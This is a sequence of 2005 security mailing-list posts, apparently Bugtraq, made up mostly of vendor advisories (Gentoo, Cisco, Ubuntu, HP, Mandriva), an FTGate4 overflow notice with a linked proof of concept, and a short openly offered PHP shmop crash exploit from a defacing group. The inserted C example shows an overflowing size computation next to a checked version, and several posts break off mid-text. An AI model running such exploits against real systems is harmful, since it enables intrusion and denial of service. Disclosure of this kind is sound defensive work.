RE: List of Security-oriented Fairs/Events/Conferences?
Help Net Security's Upcoming Conferences list at http://www.net-security.org/conferences.php has good coverage for the year 2005 too and is worth checking too.

Regards,
Juha-Matti
[ GLSA 200511-13 ] Sylpheed, Sylpheed-Claws: Buffer overflow in LDIF importer
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200511-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: Sylpheed, Sylpheed-Claws: Buffer overflow in LDIF importer
Date: November 15, 2005
Bugs: #111853
ID: 200511-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Sylpheed and Sylpheed-Claws contain a buffer overflow vulnerability which may lead to the execution of arbitrary code.

Background
==========

Sylpheed is a lightweight email client and newsreader. Sylpheed-Claws is a 'bleeding edge' version of Sylpheed. They both support the import of address books in LDIF (Lightweight Directory Interchange Format).

Affected packages
=================

     Package                      /  Vulnerable  /  Unaffected
  1  mail-client/sylpheed            2.0.4          = 2.0.4
  2  mail-client/sylpheed-claws      1.0.5-r1       = 1.0.5-r1

2 affected packages on all of their supported architectures.

Description
===========

Colin Leroy reported buffer overflow vulnerabilities in Sylpheed and Sylpheed-Claws. The LDIF importer uses a fixed length buffer to store data of variable length. Two similar problems exist also in the Mutt and Pine addressbook importers of Sylpheed-Claws.

Impact
======

By convincing a user to import a specially-crafted LDIF file into the address book, a remote attacker could cause the program to crash, potentially allowing the execution of arbitrary code with the privileges of the user running the software.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Sylpheed users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =mail-client/sylpheed-2.0.4

All Sylpheed-Claws users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =mail-client/sylpheed-claws-1.0.5-r1

References
==========

[ 1 ] CVE-2005-3354
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3354

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200511-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
Buffer Overrun in FTGate4 Groupware Mail server
/**
Package: FTGate4 Groupware Mail server
Auth: http://www.floosietek.com/
Version(s): 4.1 / previous versions may also be vulnerable
Vulnerability Type: Remote Code Execution
*/

Disclaimer:

The information is provided as is without warranty of any kind. The author of this issue shall not be held liable for any downtime, lost profits, or damages due to the information contained in this advisory.

What's FTGate4:

[description taken from the author's site]

FTGate4 is a powerful Windows(TM) communication suite that combines exceptional mail handling facilities with comprehensive Groupware functionality. Its security and collaboration features were developed in conjunction with leading ISP's and define a new era in mail server performance.

Synopsis:

FTGate4 is vulnerable to a buffer overrun which could potentially lead to execution of arbitrary code.

Description:

FTGate4 contains a security flaw in the IMAP server caused due to boundary errors in the handling of various commands (like EXAMINE).

Impact:

An attacker could exploit the vulnerability by sending a malformed request to the IMAP server running on port 143, resulting in a Denial of Service condition and potentially arbitrary code execution with the privileges of the SYSTEM user.

Workaround:

There is no known workaround at this time.

PoC:

www.lucaercoli.it/exploits/FTGate-expl.pl

Credits:

Luca Ercoli
io [at] lucaercoli.it
http://www.lucaercoli.it
Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone

Document ID: 68179
Advisory ID: cisco-sa-20051116-7920
http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml
Revision 1.0
For Public Release 2005 November 16 1600 UTC (GMT)

- -----------------------------------------------------------------------

Contents

    Summary
    Affected Products
    Details
    Impact
    Software Versions and Fixes
    Workarounds
    Obtaining Fixed Software
    Exploitation and Public Announcements
    Status of This Notice: FINAL
    Distribution
    Revision History
    Cisco Security Procedures

- -----------------------------------------------------------------------

Summary
=======

The Cisco 7920 Wireless IP Phone provides Voice Over IP service via IEEE 802.11b Wi-Fi networks and has a form-factor similar to a cordless phone. This product contains two vulnerabilities:

The first vulnerability is an SNMP service with fixed community strings that allow remote users to read, write, and erase the configuration of an affected device.

The second vulnerability is an open VxWorks Remote Debugger on UDP port 17185 that may allow an unauthenticated remote user to access debugging information or cause a denial of service.

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml.

Affected Products
=================

Vulnerable Products
+------------------

  * Cisco 7920 Wireless IP Phone, firmware version 2.0 and earlier

Products Confirmed Not Vulnerable
+--------------------------------

  * Cisco 7920 Wireless IP Phone, firmware version 2.01

No other Cisco products are currently known to be affected by these vulnerabilities, including other IP telephony products.

Details
=======

Fixed SNMP Community Strings
+---------------------------

The Cisco 7920 Wireless IP Phone provides an SNMP service with fixed read-only and read-write community strings of public and private, respectively. These strings cannot be changed by the user and will allow remote users to issue an SNMP GetRequest or SetRequest to the phone. SNMP can be used to retrieve and modify the device configuration, including stored user data such as phone book entries.

To address this vulnerability, Cisco has provided updated software that removes the SNMP functionality from this product.

This issue is documented in Cisco bug ID CSCsb75186 (registered customers only).

VxWorks Debugger Port (wdbrpc, 17185/udp)
+----------------------------------------

The Cisco 7920 Wireless IP Phone listens on UDP port 17185 to allow connections from a VxWorks debugger. This port may allow remote users to collect debugging information or conduct a denial of service attack against an affected device.

To address this vulnerability, Cisco has provided updated software that closes UDP port 17185.

This issue is documented in Cisco bug ID CSCsb38210 (registered customers only).

Impact
======

Successful exploitation of these vulnerabilities may result in information leakage or denial of service attacks against an affected device. In the case of the Fixed SNMP Community Strings vulnerability, an attack may take the form of erasure or modification of the device configuration and personal user data.

Software Versions and Fixes
===========================

Cisco has provided free software to address these vulnerabilities; please consult the chart below for details.

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

+-------------------------------------------------+----------------------------+------------------------------+
| Cisco Bug ID                                    | Affected Firmware Releases | First Fixed Firmware Release |
+-------------------------------------------------+----------------------------+------------------------------+
| CSCsb75186 (registered customers only) (SNMP)   | Release 1.0(8) and earlier | Release 1.0(9)               |
+-------------------------------------------------+----------------------------+------------------------------+
| CSCsb38210 (registered customers only) (VxWorks | Release 2.0 and earlier    | Release 2.01                 |
Buffer OverFlow For Php 4.3.10 and other ?? Local
<?php
/*
Buffer OverFlow For Php 4.3.10 and other ?? Local
Tested on: Apache 1.3.33/PHP 4.3.10 with easyphp 1.8
Credited: papipsycho
write code: papipsycho
for: G0t R00t ? AND [W]orld [D]efacers
Website: http://www.worlddefacers.net
Date: 13/11/2005
*/
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
$shm_id = shmop_open(0x00, "c", 0644, 998);
if(!$shm_id) { echo "Impossible de créer la mémoire partagée\n"; }
?>
[USN-216-1] GDK vulnerabilities
===========================================================
Ubuntu Security Notice USN-216-1          November 16, 2005
gtk+2.0, gdk-pixbuf vulnerabilities
CVE-2005-2975, CVE-2005-2976, CVE-2005-3186
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gtk2-engines-pixbuf
libgdk-pixbuf2

The problem can be corrected by upgrading the affected package to the following versions:

Ubuntu 4.10:
  libgdk-pixbuf2: 0.22.0-7ubuntu1.2
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.04:
  libgdk-pixbuf2: 0.22.0-7ubuntu2.1
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.10:
  libgdk-pixbuf2: 0.22.0-8ubuntu0.1
  gtk2-engines-pixbuf: 2.8.6-0ubuntu2.1

After a standard system upgrade you should restart your session to effect the necessary changes.

Details follow:

Two integer overflows have been discovered in the XPM image loader of the GDK pixbuf library. By tricking a user into opening a specially crafted XPM image with any Gnome desktop application that uses this library, this could be exploited to execute arbitrary code with the privileges of the user running the application. (CVE-2005-2976, CVE-2005-3186)

Additionally, specially crafted XPM images could cause an endless loop in the image loader, which could be exploited to cause applications trying to open that image to hang.
(CVE-2005-2975)

Updated packages for Ubuntu 4.10:
Re: Authentication vulnerability in Belkin wireless devices
This is very odd, as we've reproduced this vulnerability on about 5 different F5D7230-4 with firmware 4.05.3 and 4.03.3, as well as on a few of the F5D7232-4 routers with the same firmware.

This can't be a network specific setup issue, as we've tested this on several unrelated networks from Linux and Windows operating systems using Firefox and MS IE browsers.

Kind Regards,

On Wed, 2005-11-16 at 07:56 -0500, S.A.B.R.O. Net Security wrote:
> Hmmm... we were unable to reproduce this vulnerability with one of our Belkin Wifi F5D7230-4 with firmware version 4.05.03
>
> Once the admin has authenticated any other attempts to access the device from any source (hardwire lan, wifi, remote) displays the following result :
>
> Duplicate Administrator
> This device is managed by xxx.xxx.x.x currently!!

--
Andrei Mikhailovsky
Arhont Ltd - Information Security
Web: http://www.arhont.com
     http://www.wi-foo.com
Tel: +44 (0)870 4431337
Fax: +44 (0)117 9690141
PGP: Key ID - 0x2B3438DE
PGP: Server - keyserver.pgp.com
[security bulletin] SSRT051251 - Apache-based Web Server on HP-UX mod_ssl, proxy_http, Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00555254
Version: 1

HPSBUX02074 SSRT051251 - Apache-based Web Server on HP-UX mod_ssl, proxy_http, Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2005-11-10
Last Updated: 2005-11-15

Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY

Potential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access.

References: CVE-2005-2491, CVE-2005-1268, CVE-2005-2728, CVE-2005-2088.

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.00, B.11.11, B.11.23 running Apache-based Web Server prior to v.2.0.55.

BACKGROUND

The following potential security vulnerabilities are resolved in the software updates listed below:

CVE-2005-2088 (cve.mitre.org): HTTP Request Smuggling.
CVE-2005-2491 (cve.mitre.org): Integer overflow in pcre_compile.c.
CVE-2005-2728 (cve.mitre.org): Remote denial of service.
CVE-2005-1268 (cve.mitre.org): Remote denial of service.

AFFECTED VERSIONS

For IPv4:
HP-UX B.11.00
HP-UX B.11.11
=============
hpuxwsAPACHE
action: install revision A.2.0.55.00 or subsequent

For IPv6:
HP-UX B.11.11
=============
hpuxwsAPACHE,revision=B.1.0.00.01
hpuxwsAPACHE,revision=B.1.0.07.01
hpuxwsAPACHE,revision=B.1.0.08.01
hpuxwsAPACHE,revision=B.1.0.09.01
hpuxwsAPACHE,revision=B.1.0.10.01
hpuxwsAPACHE,revision=B.2.0.48.00
hpuxwsAPACHE,revision=B.2.0.49.00
hpuxwsAPACHE,revision=B.2.0.50.00
hpuxwsAPACHE,revision=B.2.0.51.00
hpuxwsAPACHE,revision=B.2.0.52.00
hpuxwsAPACHE,revision=B.2.0.53.00
hpuxwsAPACHE,revision=B.2.0.54.00
action: install revision B.2.0.55.00 or subsequent

HP-UX B.11.23
=============
hpuxwsAPACHE
action: install revision B.2.0.55.00 or subsequent

END AFFECTED VERSIONS

RESOLUTION

HP has made the following software updates available to resolve the issue.

Software updates for the Apache-based Web Server are available from:
http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=HPUXWSSUITE

HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.55.00 or subsequent.

Apache Update Procedure

Check for Apache Installation

To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system.

For example, the results of the command

    swlist -l product | grep -i apache

    hpuxwsAPACHE B.2.0.54.00 HP-UX Apache-based Web Server

Stop Apache

Before updating, make sure to stop any previous Apache binary. Otherwise, the previous binary will continue running, preventing the new one from starting, although the installation would be successful.

After determining which Apache is installed, stop Apache with the following commands:

    for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

Download and Install Apache

Download Apache from Software Depot:
http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=HPUXWSSUITE

Verify successful download by comparing the cksum with the value specified on the installation web page.

Use SD to swinstall the depot.

Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

Removing Apache Installation

If you prefer to remove Apache from your system instead of installing a newer revision to resolve the security problem, use both Software Distributor's swremove command and also rm -rf the home location as specified in the rc.config.d file HOME variables.

    %ls /etc/rc.config.d | grep apache
    hpapache2conf
    hpws_apache[32]conf

MANUAL ACTIONS: Yes - Update plus other actions
Install the revision of the product.

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system.

For more information:
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi displayProductInfo.pl?productnumber=B6834AAtN

UPDATE HISTORY

Initial release: 15 November 2005

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]

It is strongly recommended that security related
Re: List of Security-oriented Fairs/Events/Conferences?
Rainer,

I keep my list here: http://www.sicurezzainformatica.it/eventi.html

FYI, the main site is here: http://www.sicurezzainformatica.it

ciao,
Luca

-----Original Message-----
From: Rainer Duffner [mailto:[EMAIL PROTECTED]
Sent: Monday, November 14, 2005 06:39
To: bugtraq@securityfocus.com
Subject: List of Security-oriented Fairs/Events/Conferences?

Hi,

some time ago, Securityfocus had a list of upcoming security-conferences - this seems to have disappeared.

Does anyone have another link to a site that provides those?

--
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
www.sicurezzainformatica.it
PGP key fingerprint: 0249 6760 9D67 BC72 5118 CBD8 4C19 EA57 7963 DBDC
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
[security bulletin] SSRT5979 - HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00557788
Version: 1

HPSBPI02078 SSRT5979 - HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2005-11-15
Last Updated: 2005-11-15

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY

Potential vulnerabilities have been identified with the HP Jetdirect 635n IPv6/IPsec Print Server (J7961A). These vulnerabilities may be exploited remotely by an unauthorized user to create a Denial of Service (DoS).

References: NISCC Vulnerability Advisory 273756

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) running firmware versions prior to J7961A V.31.08

BACKGROUND

RESOLUTION

HP is providing a firmware update, J7961A V.31.08, to resolve this issue. The firmware can be updated using the HP Download Manager application. The HP Download Manager application can be downloaded from http://www.hp.com/go/dlm_sw.

UPDATE HISTORY

Initial release: 15 November 2005

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:

    To: [EMAIL PROTECTED]
    Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up

Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and continue.

Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php

Log in on the web page: Subscriber's choice for Business: sign-in.

On the web page: Subscriber's Choice: your profile summary
  - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW
    MA = HP Management Agents
    MI = Misc. 3rd party SW
    MP = HP MPE/iX
    NS = HP NonStop Servers
    OV = HP OpenVMS
    PI = HP Printing Imaging
    ST = HP Storage SW
    TL = HP Trusted Linux
    TU = HP Tru64 UNIX
    UX = HP-UX
    VV = HP Virtual Vault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

(c)Copyright 2005 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
MDKSA-2005:212 - Updated egroupware packages to address phpldapadmin, phpsysinfo vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2005:212
http://www.mandriva.com/security/
_______________________________________________________________________

Package : egroupware
Date: November 16, 2005
Affected: Corporate 3.0
_______________________________________________________________________

Problem Description:

Egroupware contains embedded copies of several php based projects, including phpldapadmin and phpsysinfo.

Phpldapadmin before 0.9.6c allows remote attackers to gain anonymous access to the LDAP server, even when disable_anon_bind is set, via an HTTP request to login.php with the anonymous_bind parameter set. (CAN-2005-2654)

Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the custom_welcome_page parameter. (CAN-2005-2792)

PHP remote code injection vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code via the custom_welcome_page parameter. (CAN-2005-2793)

Maksymilian Arciemowicz discovered several cross site scripting issues in phpsysinfo, a PHP based host information application. (CAN-2005-0869, 0870)

Christopher Kunz discovered that local variables in phpsysinfo get overwritten unconditionally and are trusted later, which could lead to the inclusion of arbitrary files. (CAN-2005-3347)

Christopher Kunz discovered that user-supplied input in phpsysinfo is used unsanitised, causing a HTTP Response splitting problem. (CAN-2005-3348)

The updated packages have new versions of these subsystems to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2654
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2792
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2793
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0869
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0870
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3347
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3348
_______________________________________________________________________

Updated Packages:

Corporate 3.0:
[ GLSA 200511-14 ] GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities
Gentoo Linux Security Advisory                           GLSA 200511-14
http://security.gentoo.org/

Severity: Normal
Title: GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities
Date: November 16, 2005
Bugs: #112608
ID: 200511-14

Synopsis
========

The GdkPixbuf library, that is also included in GTK+ 2, contains vulnerabilities that could lead to a Denial of Service or the execution of arbitrary code.

Background
==========

GTK+ (the GIMP Toolkit) is a toolkit for creating graphical user interfaces. The GdkPixbuf library provides facilities for image handling. It is available as a standalone library and also packaged with GTK+ 2.

Affected packages
=================

    Package                  /  Vulnerable  /  Unaffected
    1  x11-libs/gtk+            2.8.6-r1       = 2.8.6-r1  *= 2.6.10-r1  2.0
    2  media-libs/gdk-pixbuf    0.22.0-r5      = 0.22.0-r5

    2 affected packages on all of their supported architectures.

Description
===========

iDEFENSE reported a possible heap overflow in the XPM loader (CVE-2005-3186). Upon further inspection, Ludwig Nussel discovered two additional issues in the XPM processing functions: an integer overflow (CVE-2005-2976) that affects only gdk-pixbuf, and an infinite loop (CVE-2005-2975).

Impact
======

Using a specially crafted XPM image an attacker could cause an affected application to enter an infinite loop or trigger the overflows, potentially allowing the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GTK+ 2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose x11-libs/gtk+

All GdkPixbuf users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =media-libs/gdk-pixbuf-0.22.0-r5

References
==========

    [ 1 ] CVE-2005-2975
          http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2975
    [ 2 ] CVE-2005-2976
          http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2976
    [ 3 ] CVE-2005-3186
          http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3186
    [ 4 ] iDefense Security Advisory 11.15.05
          http://www.idefense.com/application/poi/display?id=339type=vulnerabilities

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200511-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
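The Description above names an integer overflow and a heap overflow in XPM processing. The following is an added illustration of that bug class in C, not code from gdk-pixbuf or from the advisory: a 32-bit size computation that wraps, beside a check of the XPM values string that rejects the same input. The function names, the caps and the 4-bytes-per-pixel buffer are assumptions of this example.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
/* Caps are assumptions made for this example, not gdk-pixbuf's limits. */
enum { XPM_MAX_DIM = 32767, XPM_MAX_COLORS = 65536, XPM_MAX_CPP = 8 };
struct xpm_sizes { size_t pixel_bytes, key_bytes; };

/* What an unchecked 32-bit size computation yields: the product wraps. */
uint32_t naive_pixel_bytes(uint32_t w, uint32_t h) { return w * h * 4u; }

/* Store a*b in *out; return 0 instead of wrapping when it does not fit. */
static int mul_checked(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a) return 0;
    *out = a * b;
    return 1;
}

/* Read one positive decimal field no larger than max and advance *p. */
static int next_field(const char **p, long max, long *out)
{
    char *end;
    errno = 0;
    long v = strtol(*p, &end, 10);
    if (end == *p || errno == ERANGE || v <= 0 || v > max) return 0;
    *p = end; *out = v;
    return 1;
}

/* Validate "<width> <height> <ncolors> <chars_per_pixel>" and compute the
 * buffer sizes a loader would allocate. Returns 0 if accepted, -1 if not. */
int xpm_check_header(const char *values, struct xpm_sizes *s)
{
    long w = 0, h = 0, nc = 0, cpp = 0;
    size_t row = 0;
    if (!next_field(&values, XPM_MAX_DIM, &w) || !next_field(&values, XPM_MAX_DIM, &h) ||
        !next_field(&values, XPM_MAX_COLORS, &nc) || !next_field(&values, XPM_MAX_CPP, &cpp) ||
        !mul_checked((size_t)w, 4, &row) || !mul_checked(row, (size_t)h, &s->pixel_bytes) ||
        !mul_checked((size_t)nc, (size_t)cpp, &s->key_bytes))
        return -1;
    return 0;
}

int main(void)
{
    struct xpm_sizes s;
    int rc = xpm_check_header("65536 16384 2 1", &s);   /* constructed input */
    printf("naive=%u checked=%d\n", (unsigned)naive_pixel_bytes(65536, 16384), rc);
}
```

The caps alone keep the products in range on common platforms; the checked multiply is kept so the size computation stays safe if the caps are later raised.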
[security bulletin] SSRT5979 - HP-UX Running IPSec Remote Denial of Service (DoS)
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00555601
Version: 1

HPSBUX02076 SSRT5979 - HP-UX Running IPSec Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2005-11-11
Last Updated: 2005-11-15

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP-UX running IPSec. These vulnerabilities may be exploited remotely by an unauthorized user to create a Denial of Service (DoS).

References: NISCC Vulnerability Advisory 273756

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, and B.11.23 running IPSec.

BACKGROUND
To determine if an HP-UX system has an affected version, search the output of swlist -a revision -l fileset for one of the filesets listed below. For affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.00
=============
IPSec.IPSEC2-KRN
action: install revision A.01.05.01 or subsequent

HP-UX B.11.11
=============
IPSec.IPSEC2-KRN
action: install revision A.01.07.02 or subsequent

HP-UX B.11.11
=============
IPSec.IPSEC2-KRN,revision=A.02.00
action: install revision A.02.01 or subsequent

HP-UX B.11.23
=============
IPSec.IPSEC2-KRN
action: install revision A.02.01 or subsequent

END AFFECTED VERSIONS

RESOLUTION
HP has made the following software updates available to resolve the issue. The updates are available from http://www.hp.com/go/softwaredepot

HP-UX B.11.00 HP-UX IPSec A.01.05.01 or subsequent
HP-UX B.11.11 HP-UX IPSec A.01.07.02
HP-UX B.11.11 HP-UX IPSec A.02.01 or subsequent
HP-UX B.11.23 HP-UX IPSec A.02.01 or subsequent

MANUAL ACTIONS: Yes - Update
HP-UX B.11.00 HP-UX IPSec A.01.05.01 or subsequent
HP-UX B.11.11 HP-UX IPSec A.01.07.02
HP-UX B.11.11 HP-UX IPSec A.02.01 or subsequent
HP-UX B.11.23 HP-UX IPSec A.02.01 or subsequent

PRODUCT SPECIFIC INFORMATION
HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi displayProductInfo.pl?productnumber=B6834AAtN

UPDATE HISTORY
Initial release: 15 November 2005

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
